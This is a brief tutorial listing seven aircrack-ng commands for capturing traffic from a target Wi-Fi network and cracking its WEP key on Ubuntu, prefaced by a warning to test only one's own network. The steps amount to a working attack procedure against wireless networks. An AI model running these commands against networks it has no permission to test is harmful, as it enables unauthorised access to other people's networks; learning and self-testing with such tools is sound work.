Crack Wifi (WLAN) WEP key with aircrack-ng in Ubuntu Linux - Hacking Pentest HowTo Tutorial

Only test with your own wireless network. In most countries it's not allowed by law!

List of commands (replace the parts of the commands which are written in upper case letters with your systems data):

1. sudo apt update
2. sudo apt install aircrack-ng
3. iwconfig
4. sudo airmon-ng start WLAN-INTERFACE
5. sudo airodump-ng MONITOR-WLAN-INTERFACE
6. sudo airodump-ng MONITOR-WLAN-INTERFACE --bssid BSSID-OF-THE-TARGET -w /var/wepcap
7. sudo aircrack-ng /var/wepcap-01.cap
